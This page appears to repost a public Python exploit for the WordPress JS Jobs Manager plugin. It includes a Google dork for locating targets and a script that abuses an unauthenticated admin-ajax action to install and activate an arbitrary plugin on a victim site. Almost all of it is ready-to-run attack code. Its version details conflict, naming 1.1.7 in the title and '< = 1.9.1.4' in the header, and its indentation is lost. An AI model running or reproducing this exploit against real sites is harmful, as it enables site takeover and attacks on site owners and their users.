WordPress JS Jobs Manager 1.1.7 Authorization Bypass – Torchsec
# Google Dork: inurl:/wp-content/plugins/js-jobs/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/js-jobs/
# Version: < = 1.9.1.4
# Tested on: Ubuntu 20.04.1
import os.path
from os import path
import json
import requests;
import sys
def print_banner():
print("JS Job Manager < = 1.1.7 - Arbitrary Plugin Install/Activation")
print("Author -> space_hen (www.github.com/spacehen)")
def print_usage():
print("Usage: python3 exploit.py [target url] [plugin slug]")
print("Ex: python3 exploit.py https://example.com advanced-uploader")
print("Note: To activate plugin successfully, main plugin file")
print("should match slug, i.e ./plugin-slug/plugin-slug.php")
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("Not Allowed!" in raw):
return True;
else:
return False;
def main():
print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);
base = sys.argv[1]
slug = sys.argv[2]
ajax_action = 'jsjobs_ajax'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
data = {
"task" : "installPluginFromAjax",
"jsjobsme" : "jsjobs",
"pluginslug" : slug
}
print("Installing plugin...");
response = requests.post(uri, data=data )
print("Activating plugin...");
data = {
"task" : "activatePluginFromAjax",
"jsjobsme" : "jsjobs",
"pluginslug" : slug
}
response = requests.post(uri, data=data )
main();
Gloss